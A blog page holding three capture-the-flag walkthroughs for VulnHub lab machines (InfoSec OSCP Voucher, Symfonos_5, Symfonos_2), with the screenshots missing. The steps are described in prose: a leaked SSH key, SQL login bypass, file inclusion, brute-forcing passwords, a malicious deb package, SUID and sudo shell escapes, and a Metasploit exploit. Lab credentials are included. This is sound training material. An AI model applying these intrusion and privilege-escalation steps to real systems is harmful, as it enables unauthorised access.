AdSense

Tuesday, March 1, 2022

InfoSec OSCP Voucher

 INFOSEC OSCP VOUCHER

- Layout for this exercise:










1 - INTRODUCTION

- The goal of this exercise is to develop a hacking process for the vulnerable machine InfoSec OSCP Voucher, from the VulnHub pentesting platform.

InfoSec OSCP Voucher can be downloaded from here:

https://www.vulnhub.com/entry/infosec-prep-oscp,508/


- Once the virtual machine downloaded and extracted with VirtualBox:








2 - ENUMERATION

- Scanning with Nmap:








- Scanning deeper port 80 we find robots.txt and the file secret.txt:











- Browsing the web server:























- However the most interesting piece of information is at the bottom part: "the only user on this box is oscp"













- secret.txt is a large text file ended with == , so it is probably encoded with base64:


































- Transferring secret.txt to Kali:









- Decoding secret.txt and passing to a new file named key, we discover it is an OpenSSH Private key:





3 - EXPLOITATION

- Setting right permissions to key:




- Now we can SSH with user oscp and key:















4 - PRIVILEGE ESCALATION

- Looking for binaries with SUID, let's focus our attention on /usr/bin/bash:






- Finally it's easy to get a root shell, just running /usr/bin/bash with option -p:






5 - CAPTURING THE FLAG

- Going to root's folder and reading the flag:











Posted by at
Labels:

Symfonos_5


SYMFONOS_5

- Layout for this exercise:










1 - INTRODUCTION

The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_5, from the VulnHub pentesting platform.

-  Symfonos_5 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-52,415/

- Once the virtual machine downloaded and extracted with VirtualBox









2 - ENUMERATION

- Scanning with Nmap:










- Browsing the web server:















- Dirbusting the web server we find admin.php:





















- Connecting to admin.php there is a Login form:















3 - EXPLOITATION

- Wfuzz and wordlist SQL.txt bruteforce the Login application:


























- There is a successful 302 response for Payload "*", what we should try at the Login form:

















- The Login is successful and we are presented with the page home.php:
















- View-sourcing home.php there is an interesting URL that leads to the idea of LFI (Local File Inclusion):














- Checking the URL it connects to the localhost 127.0.0.1 and the page portraits.php:





















- Finally we discover that the webpage is vulnerable to RFI, because we can read /etc/passwd:












- Going to admin.php:
















- View-sourcing admin.php we discover credentials admin:qMDdyZh3cT6eeAWD for LDAP:
























- ldapsearch opens a connection to LDAP server at port 389 and provides a Base64 encrypted password Y2V0a0tmNHdDdUhDOUZFVA== for user zeus:





- Decrypting Y2V0a0tmNHdDdUhDOUZFVA==







- Now we can SSH:












4 - PRIVILEGE ESCALATION

- User zeus has got suder privilege for /usr/bin/dpkg:







- dpkg is a tool to manage Debian packages, so the idea for Privilege Escalation could to run a deb package containing a script to run /bin/bash as a root.

- fpm builds different types of packages like deb, rpm, etc..:

https://fpm.readthedocs.io/en/v1.13.1/intro.html

- Installing fpm:






















- Writing a simple exploit.sh:





- fpm creates a deb package for exploit.sh:









- Transferring exploit_1.0_amd64.deb:






- Running exploit_1.0_amd64.deb with /usr/bin/dpkg we get a root shell:








5 - CAPTURE THE FLAG

- Reading proof.txt:

















   


Posted by at
Labels:

Symfonos_2

 SYMFONOS 2

- Layout for this exercise:



1 - INTRODUCTION

 - The goal of this exercise is to develop a hacking process for the vulnerable machine Symfonos_2, from the VulnHub pentesting platform.

- Symfonos_2 can be downloaded from here:

https://www.vulnhub.com/entry/symfonos-2,331/

- Once the virtual machine downloaded and extracted with VirtualBox:



2 - ENUMERATION

- Scanning with Nmap:



- Connecting to the web server:



- Scanning with enum4linux we discover a shared folder named anonymous:




- Connecting with credentials anonymous:anonymous:






- Changing to folder backups and getting log.txt:










- log.txt reveals the existence of user aeolus:







3 - EXPLOITATION

- Hydra and rockyou.txt discover password sergioteamo for user aeolus:




- However direct SSH access is denied:





- Metasploit with module ssh_login yields better result:

 

4 - PRIVILEGE ESCALATION

- netstat lists open connections, for instance at port 8080:




- To access web server at port 8080 we must forward connection to another port, for instance 4444:



- Now, connection to the hidden web server is available:



- Application LibreNMS is vulnerable to this exploit:




- Looking for a related Metasploit module:



- Setting parameters and running the exploit we have a new command shell, for user named cronus:


- Improving the shell:


- Searching for cronus' sudoer privileges:




- Command mysql with option \! allows to run any \system command, as explained here:

https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-commands.html





- Running /bin/bash we get a remote root shell:




5 - CAPTURING THE FLAG

- Reading proof.txt:






Posted by at
Labels:
Subscribe to: Posts (Atom)